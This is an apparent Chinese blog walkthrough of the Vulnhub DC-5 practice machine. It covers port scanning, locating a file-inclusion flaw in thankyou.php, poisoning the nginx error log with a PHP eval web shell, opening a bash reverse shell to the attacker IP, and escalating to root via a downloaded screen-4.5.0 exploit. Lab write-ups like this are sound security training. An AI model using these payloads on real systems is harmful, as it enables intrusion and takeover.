Vulnhub靶机:DC5

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:DC5(10.0.2.58)

目标:获取靶机root权限和flag

靶机下载地址:https://download.vulnhub.com/dc/DC-5.zip

二、信息收集

使用nmap主机发现靶机ip:10.0.2.58

使用nmap端口扫描发现靶机开放端口:80、111、40315

复制代码
nmap -A 10.0.2.58 -p 1-65535

打开网站未发现可利用的功能点,查看源码也没有发现隐藏信息

使用gobuster和dirsearch工具爆破目录

复制代码
gobuster dir -u http://10.0.2.58/ -x txt,php,html,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

dirsearch -u http://10.0.2.58


网站没有什么可利用的功能点,可以尝试对每一个爆破出来的php文件进行模糊性测试,看看也没有LFI。

发现thankyou.php文件存在文件包含漏洞

复制代码
wfuzz -w /usr/share/wordlists/wfuzz/general/common.txt http://10.0.2.58/thankyou.php?FUZZ=/etc/passwd


三、漏洞利用

根据nmap的扫描结果,靶机使用nginx搭建网站,可以尝试包含nginx的配置文件。

复制代码
http://10.0.2.58/thankyou.php?file=/etc/nginx/nginx.conf

配置文件中获得了nginx错误日志的路径和访问日志路径

复制代码
access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;

直接包含nginx错误日志和访问日志,看看

发现错误日志包含成功,访问日志包含失败。那么我们可以利用错误日志来构造合法的php代码,从而利用包含漏洞

构造错误请求,写入错误日志,注意直接使用浏览器写入<>会被url编码,使用蚁剑连接失败,使用burpsuite写入连接成功

复制代码
http://10.0.2.58/thankyou.php?file=<?php @eval($_POST['pass']);?>


反弹shell

复制代码
bash -c 'bash -i >& /dev/tcp/10.0.2.15/4444 0>&1'

获取交互式shell

复制代码
python -c 'import pty; pty.spawn("/bin/bash")'

四、提权

执行命令find / -perm -u=s -type f 2>/dev/null查看一下具有SUID权限的二进制可执行文件,发现存在可以文件/bin/screen-4.5.0

使用searchsploit搜索screen v4.5.0的历史漏洞,发现存在提权漏洞

复制代码
searchsploit screen 4.5.0       

将exp下载下来,通过web服务上传到靶机,执行进行提权

复制代码
cd /tmp
wget http://10.0.2.15/41154.sh
chmod +x 41154.sh
./41154.sh

获取flag

相关推荐
一次旅行2 天前
网络安全总结
安全·web安全
一名优秀的码农2 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
努力的lpp2 天前
SQLMap CTF 常用命令全集
数据库·web安全·网络安全·sql注入
努力的lpp2 天前
SQL 报错注入
数据库·sql·web安全·网络安全·sql注入
上海云盾商务经理杨杨2 天前
2025年重大网络安全事件回顾与趋势分析
网络·安全·web安全
岛屿旅人2 天前
2025年中东地区网络安全态势综述
网络·安全·web安全·网络安全
上海云盾商务经理杨杨2 天前
2026年企业网络安全方向预防预测:在AI工业化时代构建主动免疫体系
人工智能·安全·web安全
努力的lpp2 天前
【ctf常用备用文件名字典】
web安全·网络安全·ctf
志栋智能2 天前
安全超自动化:从被动防御到主动响应的革命
运维·网络·数据库·人工智能·安全·web安全·自动化
合天网安实验室2 天前
H5渗透实战:从负数金额漏洞到签名绕过
web安全·漏洞挖掘·h5渗透·签名绕过